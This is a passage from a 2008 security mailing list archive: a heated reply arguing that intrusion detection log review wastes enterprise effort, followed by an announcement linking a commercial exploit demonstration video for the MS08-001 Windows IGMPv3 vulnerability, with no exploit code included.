16:31:52 -0800 Subject: [Dailydave] Semi-anonymized moderation. In-Reply-To: <20080128220422.GB7071@snort.org> References: <479DE915.80200@immunityinc.com> <20080128163339.GA5796@snort.org> <085485A8ADCB4B49874A54D6185A21FD017626C1@exch2.verniernetworks.com> <20080128220422.GB7071@snort.org> Message-ID: <9b4f936f0801281631m336016cfg3c7658dbe48b7ffd@mail.gmail.com> Again, small improvements are better than none. > This argument is NOT correct when the so called "improvements" steals time and money from an Enterprise. Going through IDS logs, configuring NIDS etc. are time and money consuming tasks that deliver little in return. There are actually far more rewarding things your IT security personal could do rather than shifting through immense amount of pointless IDS logs. How about auditing your webapps and third party applications ? Checking and deploying critical security fixes for the high risk environments etc etc This has been stated several times before but it won't hurt to say it again. Defending protocol parsers by writing more protocol parsers on top was the dumbest infosec idea ever concieved. And it amazes me that people making a living out of this, still trying to defend it with pointless than ever arguments. You lost the game, its time to change the game plan or to shut up. Let your sales drone do the evangelism. We are in 2008 and the art of hacking, REing, exploitation has evolved far beyond than your capabilities. Evolve or *die, simple as that ... -olef * I have always understood and agreed to the concept of companies making business on selling crap and people making a living on doing shit. I see that it is a necessary concept to keep the market economy going but I wouldn't take it as far as to defend it. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080128/844ae5bc/attachment.htm From dave at immunityinc.com Tue Jan 29 15:01:54 2008 From: dave at immunityinc.com (Dave Aitel) Date: Tue, 29 Jan 2008 15:01:54 -0500 Subject: [Dailydave] Kostya Kortchinsky takes on MS08-001 Message-ID: <479F8632.5070801@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 http://www.immunityinc.com/documentation/ms08_001.html The above URL is a flash movie showing the latest version of the MS08-001 exploit now in CANVAS Early Updates. This demonstrates conclusively that the MS08-001 IGMPv3 vulnerability is highly exploitable. In the movie you can see the attack target a local subnet which is populated with two Windows XP SP2 machines (with firewall enabled). More information on CANVAS Early Updates is available here: http://www.immunityinc.com/products-early_updates.shtml Thanks, Dave Aitel Immunity, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHn4YxB8JNm+PA+iURAveMAJ4ottdvqJveJuflwME1JW6q0DDa/wCgjkce WOHN0IR6hIG8ybeOKeI4dhg= =dIE1 -----END PGP SIGNATURE-----